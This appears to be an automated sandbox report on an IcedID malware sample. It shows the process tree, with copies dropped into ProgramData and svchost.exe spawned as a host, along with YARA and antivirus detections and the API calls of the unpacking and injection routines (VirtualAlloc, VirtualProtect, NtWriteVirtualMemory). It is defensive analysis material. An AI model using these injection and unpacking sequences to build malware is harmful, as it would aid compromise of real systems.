Yara matches:	Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000014.00000002.2218733852.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000014.00000002.2218733852.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000014.00000002.2218293819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000014.00000002.2218293819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000014.00000003.2217134294.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000014.00000003.2217134294.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000014.00000002.2218733852.000000000068D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000014.00000002.2218733852.000000000068D000.00000004.00000020.00020000.00000000.sdmp, Author: kevoreilly
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 5876, Parent PID: 6740

General

Target ID:	21
Start time:	11:11:16
Start date:	29/09/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0x210000
File size:	47'016 bytes
MD5 hash:	B7C999040D80E5BF87886D70D992C51E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Author: kevoreilly
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: ziczv.exePID: 3772, Parent PID: 1088

General

Target ID:	22
Start time:	11:11:17
Start date:	29/09/2023
Path:	C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe
Imagebase:	0x400000
File size:	498'176 bytes
MD5 hash:	78B74716214690CD7677CD2596C4E1A6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000016.00000003.2450165604.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000016.00000003.2450165604.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000016.00000002.2451300303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000016.00000002.2451300303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000016.00000002.2451887534.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000016.00000002.2451887534.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000016.00000002.2451887534.000000000075D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000016.00000002.2451887534.000000000075D000.00000004.00000020.00020000.00000000.sdmp, Author: kevoreilly
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 5056, Parent PID: 3772

General

Target ID:	23
Start time:	11:11:39
Start date:	29/09/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0x210000
File size:	47'016 bytes
MD5 hash:	B7C999040D80E5BF87886D70D992C51E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, Author: kevoreilly
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: uvtsuvts.exePID: 1584, Parent PID: 1088

General

Target ID:	24
Start time:	11:11:40
Start date:	29/09/2023
Path:	C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe
Imagebase:	0x400000
File size:	498'176 bytes
MD5 hash:	78B74716214690CD7677CD2596C4E1A6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000018.00000003.2700767215.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000018.00000003.2700767215.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000018.00000002.2702209444.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000018.00000002.2702209444.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000018.00000002.2702209444.000000000071A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000018.00000002.2702209444.000000000071A000.00000004.00000020.00020000.00000000.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000018.00000002.2701702242.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 00000018.00000002.2701702242.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Author: kevoreilly
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 3712, Parent PID: 1584

General

Target ID:	26
Start time:	11:12:04
Start date:	29/09/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0x210000
File size:	47'016 bytes
MD5 hash:	B7C999040D80E5BF87886D70D992C51E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Author: kevoreilly
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: czipqtsh.exePID: 2904, Parent PID: 1088

General

Target ID:	27
Start time:	11:12:07
Start date:	29/09/2023
Path:	C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe
Imagebase:	0x400000
File size:	498'176 bytes
MD5 hash:	78B74716214690CD7677CD2596C4E1A6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 0000001B.00000002.2950973983.000000000061A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 0000001B.00000002.2950973983.000000000061A000.00000004.00000020.00020000.00000000.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 0000001B.00000003.2949720196.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 0000001B.00000003.2949720196.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 0000001B.00000002.2950589703.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 0000001B.00000002.2950589703.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Author: kevoreilly Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 0000001B.00000002.2950973983.00000000005FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 0000001B.00000002.2950973983.00000000005FD000.00000004.00000020.00020000.00000000.sdmp, Author: kevoreilly
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 6728, Parent PID: 2904

General

Target ID:	28
Start time:	11:12:29
Start date:	29/09/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0x210000
File size:	47'016 bytes
MD5 hash:	B7C999040D80E5BF87886D70D992C51E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: IcedID, Description: IcedID Payload, Source: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, Author: kevoreilly
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: GziaFibS0d.exePID: 7020, Parent PID: 4376COMMON

Execution Graph

Execution Coverage:	7.6%
Dynamic/Decrypted Code Coverage:	71.2%
Signature Coverage:	35.6%
Total number of Nodes:	208
Total number of Limit Nodes:	12

Executed Functions

Function 004010CF Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 75
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OutputDebugStringA.KERNEL32(fail 3), ref: 004010EE
NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00401122
OutputDebugStringA.KERNEL32(fail 2), ref: 00401133

Strings

Start, xrefs: 00401167
fail 3, xrefs: 004010E9
Stop Err, xrefs: 00401187
fail 2, xrefs: 0040112E
fail 1, xrefs: 0040114E
Stop ok, xrefs: 00401180

Memory Dump Source

Source File: 00000000.00000002.1024321997.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1024301226.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024337010.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024363578.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024387310.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_GziaFibS0d.jbxd

Yara matches

Similarity

API ID: DebugOutputString$CreateProcessUser
String ID: Start$Stop Err$Stop ok$fail 1$fail 2$fail 3
API String ID: 976970837-1310772363
Opcode ID: f498b5b8b7e85bdb1976bf98945623132273431d24ab6f40ffb868399b8cd4d0
Instruction ID: 243eedd8a4f49eb320fdfb0d7e1e77221009fbf540129bad84db16ccdf4411bb
Opcode Fuzzy Hash: f498b5b8b7e85bdb1976bf98945623132273431d24ab6f40ffb868399b8cd4d0
Instruction Fuzzy Hash: 1421CA32605209BBCB055F94DD01E9A3F29EB0C725B214237FE00B61F4DA7AC960AB99

Uniqueness

Uniqueness Score: -1.00%

Function 004D04F4 Relevance: 13.8, APIs: 9, Instructions: 331
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00000992,00003000,00000040,00000992,004D0000), ref: 004D05D8
VirtualAlloc.KERNELBASE(00000000,000001A9,00003000,00000040,004D003A), ref: 004D060F
VirtualAlloc.KERNELBASE(00000000,0000B2A2,00003000,00000040), ref: 004D066F
VirtualFree.KERNELBASE(00610000,00000000,00008000), ref: 004D06A5
VirtualProtect.KERNELBASE(00400000,00009000,00000004,004D04CF), ref: 004D07B4
VirtualProtect.KERNEL32(00400000,00001000,00000004,004D04CF), ref: 004D07DB

Part of subcall function 004D03A1: LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 004D03DA

VirtualProtect.KERNELBASE(00400000,?,00000002,004D04CF), ref: 004D08A1
VirtualProtect.KERNELBASE(00400000,?,00000002,004D04CF,?), ref: 004D08F7
VirtualFree.KERNELBASE(00610000,00000000,00008000), ref: 004D091B

Memory Dump Source

Source File: 00000000.00000002.1024655906.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_GziaFibS0d.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free$LibraryLoad
String ID:
API String ID: 1732388798-0
Opcode ID: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction ID: 5b8d6d44943f966859809d811764de0a24c7a30712ad89de33a609d7e609d4da
Opcode Fuzzy Hash: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction Fuzzy Hash: 5FD17C726002009FEB11EF54CC90F5277A6FF64710F99029AED0D9F76ADA74A921CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 00422152 Relevance: 13.8, APIs: 9, Instructions: 331
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000992,00003000,00000040,00000992,00421C5E), ref: 00422236
VirtualAlloc.KERNEL32(00000000,000001A9,00003000,00000040,00421C98), ref: 0042226D
VirtualAlloc.KERNEL32(00000000,0000B2A2,00003000,00000040), ref: 004222CD
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00422303
VirtualProtect.KERNEL32(00400000,00000000,00000004,0042212D), ref: 00422412
VirtualProtect.KERNEL32(00400000,00001000,00000004,0042212D), ref: 00422439
VirtualProtect.KERNEL32(00000000,?,00000002,0042212D), ref: 004224FF
VirtualProtect.KERNEL32(00000000,?,00000002,0042212D,?), ref: 00422555
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00422579

Memory Dump Source

Source File: 00000000.00000002.1024531625.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_GziaFibS0d.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction ID: 825025660836190913fdd1bb514e6233e9fadebdfec7ebde24a9587a44909d83
Opcode Fuzzy Hash: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction Fuzzy Hash: 2FD19E72700100AFEB14EF54CD80F6277A6FF68310B890295ED0D9F26ADB74A921CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 00401C79 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,?,00401D53,00001000,00000000,00000000,?,00401467,00000000,?,?,?,?,00401295), ref: 00401C7F
RtlAllocateHeap.NTDLL(00000000,?,00401467,00000000,?,?,?,?,00401295), ref: 00401C86

Memory Dump Source

Source File: 00000000.00000002.1024321997.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1024301226.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024337010.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024363578.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024387310.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_GziaFibS0d.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: af29794abdbade58b16b445bdb6112b6466faf214ccefe91d731fee372fe0b5d
Instruction ID: bbb82e670732032ebf8e303bc8a39f8b906a07d9cff939e05880545c35f94fa9
Opcode Fuzzy Hash: af29794abdbade58b16b445bdb6112b6466faf214ccefe91d731fee372fe0b5d
Instruction Fuzzy Hash: 9EB00275546240EBDE416FE59F0DA097E7DBB84743F008454B349E5064CA758514DB25

Uniqueness

Uniqueness Score: -1.00%

Function 004015BE Relevance: 1.5, APIs: 1, Instructions: 20
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00000000,00000000,00000000,75539350,00003000,00000004), ref: 004015DB

Memory Dump Source

Source File: 00000000.00000002.1024321997.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1024301226.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024337010.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024363578.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024387310.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_GziaFibS0d.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: c89adba908ca871be9ce827485f4956cce24457d38a3e40d239f8f1f7eb3a445
Instruction ID: 5f65e376ed05142d156b79c11863de9d8c1410112659dc892d0819c29325736b
Opcode Fuzzy Hash: c89adba908ca871be9ce827485f4956cce24457d38a3e40d239f8f1f7eb3a445
Instruction Fuzzy Hash: 71E0EC7556020CBBEF01CF90DD46FE977BCEB00715F104150B904D6090D775AB149B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040160F Relevance: 1.5, APIs: 1, Instructions: 16
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL(00401692,00000000,00000000,?,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1024321997.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1024301226.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024337010.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024363578.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024387310.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_GziaFibS0d.jbxd

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: dd962de9b64438870b2894e6f6e0c6ee5c7c009fcec118a3b940f06222a4811c
Instruction ID: 5a808b04aabe2117a938e4500ca1c1b9b1ef177e0b005ac0e652288855810eb1
Opcode Fuzzy Hash: dd962de9b64438870b2894e6f6e0c6ee5c7c009fcec118a3b940f06222a4811c
Instruction Fuzzy Hash: 78D0C93255410DBFCF029FA4DD05CAA7B6EFB09211B004665FE29D2060D6329A34AB91

Uniqueness

Uniqueness Score: -1.00%

Function 004015EE Relevance: 1.5, APIs: 1, Instructions: 15
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(00000044,?,00000010,?,004010CF), ref: 00401602

Memory Dump Source

Source File: 00000000.00000002.1024321997.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1024301226.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024337010.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024363578.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024387310.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_GziaFibS0d.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 4da293ee12ca45bf45e600fb64d5736a10573e54717f0195352ef75157bb5ffd
Instruction ID: 2a43cff2ce15a73ccafebcd56fae5865f2d1f9501d48921ddcbb68ebc334f4a9
Opcode Fuzzy Hash: 4da293ee12ca45bf45e600fb64d5736a10573e54717f0195352ef75157bb5ffd
Instruction Fuzzy Hash: C1D0C93205410EBFDF019FA0DD05CEA3B6DEB05255B004121FA19D1060E632D6699B90

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 70
sleepprocessstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineA.KERNEL32 ref: 0040100A
StrStrIA.KERNELBASE(00000000, /u), ref: 00401018
Sleep.KERNEL32(00001388), ref: 00401027
ExitProcess.KERNEL32 ref: 00401039
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040107F
SetCurrentDirectoryW.KERNELBASE(?), ref: 0040108C
lstrcatW.KERNEL32(?,?), ref: 004010A7
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004010C3

Strings

/u, xrefs: 00401012

Memory Dump Source

Source File: 00000000.00000002.1024321997.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1024301226.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024337010.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024363578.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024387310.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_GziaFibS0d.jbxd

Yara matches

Similarity

API ID: DirectoryProcess$CommandCreateCurrentExitLineSleepSystemlstrcat
String ID: /u
API String ID: 4042104365-4118749740
Opcode ID: b747ae3141204b1c38ca21bc4f55e1c812c318ab8368f1fa781a2d1dd495982a
Instruction ID: 96ee623e9da2e0af38eded0e061056f2ac1dfe5269435d034bd7705fbe78fb85
Opcode Fuzzy Hash: b747ae3141204b1c38ca21bc4f55e1c812c318ab8368f1fa781a2d1dd495982a
Instruction Fuzzy Hash: 36115472802619ABDB20AFB1DD0DEDE7B7CAF08705F10003AF605F20A5D63897458BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401CB5 Relevance: 3.0, APIs: 2, Instructions: 8
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00000000,0040157D,00000000,00000000,00000000,?,530C1AEE,004020E8), ref: 00401CC2
RtlFreeHeap.NTDLL(00000000,?,530C1AEE,004020E8), ref: 00401CC9

Memory Dump Source

Source File: 00000000.00000002.1024321997.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1024301226.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024337010.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024363578.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024387310.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_GziaFibS0d.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: a17b4e92315cbfe38b156d6706c7fcabeb76f83999710892967727563ebf0b78
Instruction ID: de2e74cc2c5d9c26438789ecc4f5efd00e9e3bcaa0604652a6375203050d3e1d
Opcode Fuzzy Hash: a17b4e92315cbfe38b156d6706c7fcabeb76f83999710892967727563ebf0b78
Instruction Fuzzy Hash: E3C04C31449240FBEF015F909B0CB0A7ABDAB84743F008468F149A11A486748944DB15

Uniqueness

Uniqueness Score: -1.00%

Function 004D03A1 Relevance: 1.6, APIs: 1, Instructions: 56
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 004D03DA

Memory Dump Source

Source File: 00000000.00000002.1024655906.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_GziaFibS0d.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
Instruction ID: ed316663b0d8549045e3009b162730f000664aac39c59a416d22eb523f340e0e
Opcode Fuzzy Hash: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
Instruction Fuzzy Hash: 3C01D473A00204ABEB208A19DC50F6B7369EFC5720F29C527FD06EB341D6B8DC0245B9

Uniqueness

Uniqueness Score: -1.00%

Function 00401593 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,00401442,00401295), ref: 004015AA

Memory Dump Source

Source File: 00000000.00000002.1024321997.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1024301226.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024337010.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024363578.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024387310.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_GziaFibS0d.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: d38c51f324250414f169d42e986cd6cb3458d82db6cc8dc1e70cf848005a2c4a
Instruction ID: 98ea57f8acb340bf8185d7c41957bfe50ebb8c53553d8a1b8998a7004bdb3259
Opcode Fuzzy Hash: d38c51f324250414f169d42e986cd6cb3458d82db6cc8dc1e70cf848005a2c4a
Instruction Fuzzy Hash: 47D05E33C0830C5ACB04EBF19A0E8CD77FC9B0C214F1004A6E505B2080FA76EA5883A8

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401264 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(00000000, /p=,00401033,00000000), ref: 0040126D
StrToIntA.SHLWAPI(-00000004), ref: 0040127B
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\GziaFibS0d.exe,00000104), ref: 004012A1

Strings

C:\Users\user\Desktop\GziaFibS0d.exe, xrefs: 0040129A
/p=, xrefs: 00401264

Memory Dump Source

Source File: 00000000.00000002.1024321997.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1024301226.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024337010.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024363578.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024387310.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_GziaFibS0d.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID: /p=$C:\Users\user\Desktop\GziaFibS0d.exe
API String ID: 514040917-72592831
Opcode ID: 2d4bb584e25658cc2728f9be044f66e59ae58770c4c6207fcfe1ce4352e57228
